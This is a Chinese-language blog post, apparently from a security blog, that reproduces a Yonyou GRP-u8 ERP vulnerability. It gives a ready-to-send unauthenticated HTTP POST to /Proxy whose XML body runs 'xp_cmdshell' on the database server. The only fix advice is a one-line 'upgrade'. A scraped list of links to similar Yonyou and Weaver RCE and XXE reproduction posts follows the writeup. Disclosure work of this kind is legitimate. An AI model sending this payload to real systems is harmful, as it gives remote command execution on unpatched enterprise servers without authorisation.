0x00 漏洞描述

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

0x01 漏洞利用条件

无需登录

0x02 漏洞复现

POC:

POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cachecVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

burp抓包,修改url为/Proxy,在body中添加payload

0x03 修复建议

升级最新版本

转载请注明:Adminxe's Blog » 用友GRP-u8 XXE 漏洞复现

用友GRP-u8 XXE 漏洞复现相关推荐

  1. 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...

  2. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  3. 用友NC目录遍历漏洞复现

    简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息. 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFi ...

  4. Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析

    0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...

  5. CNVD-2021-30167 用友NC命令执行漏洞复现

    一.漏洞概述 2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8. 用友NC是面向集团企 ...

  6. 用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)

    0x01 产品简介 用友NC是一款企业级ERP软件.作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计.采购管理.销售管理.物料管理.生产计划和人力资源管理等,帮助企业实现数字化转 ...

  7. 泛微E-Cology XXE漏洞复现(QVD-2023-16177)

    0x01 产品简介 泛微协同管理应用平台E-Cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

  8. xxe漏洞浅谈以及复现

    一.xxe利用部分 <?xml version="1.0" encoding="utf-8"?> ----> xml声明 <!DOCTY ...

  9. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

最新文章

  1. 浅谈CSRF攻击方式
  2. linux 服务管理两种方式service和systemctl
  3. Mybatis字段模糊查询
  4. 谷歌开发者工具详解 Network篇
  5. jQuery——parent(),parents(),offsetParent(),closets()方法
  6. 二叉树(多路平衡搜索树)-(代码、分析、汇编)
  7. python读取栅格gdal库下载链接
  8. Socket粘包问题终极解决方案—Netty版(2W字)!
  9. Python爬虫从入门到放弃(二十)之 Scrapy分布式原理
  10. 上手测试GaussDB(for Redis) 和开源 Redis,只为推荐质优价廉的Redis
  11. 编写高质量代码改善C#程序的157个建议——建议50:在Dispose模式中应区别对待托管资源和非托管资源...
  12. Windows XP Home Edition安裝 IIS 的方法
  13. 至强3系列服务器cpu吗,做3D MAX是要求CPU好一点 还是显卡好一点? CPU的话是界面CPU(i 系列)好还是服务器CPU(至强系列)好?...
  14. python全套学习资料_20小时学会python的心路历程,附全套学习资料和视频教程
  15. java guardedby_JAVA多线程(五)模式-Guarded Suspension
  16. 联接无止境!500万台AP潜在大数据流量入口
  17. 3D打印云平台在线显示
  18. python day02
  19. 【单片机原理及其应用】第五章定时器的介绍和习题分析
  20. php免费利用飞信发送验证码,php通过飞信发送短信

热门文章

  1. 暴力破解MD5密码[单线程]
  2. 什么是DDX,DDY,DDZ?
  3. 长时间戴耳机耳朵不舒服?骨传导耳机可以缓解这个问题
  4. 个人项目 免费开源 基于STM32F103的oled示波器,频谱fft adc电压采集 spi接口0.96寸oled
  5. IBM AppScan 安全扫描报告中部分问题的解决办法
  6. Excel中日期、数字、中文大写金额等转文本
  7. input输入长度与限制内容
  8. 三款ANI光标漏洞蠕虫病毒专杀工具及两个补丁
  9. 搭建环境创建vue项目
  10. 全屋智能--智慧家庭新风向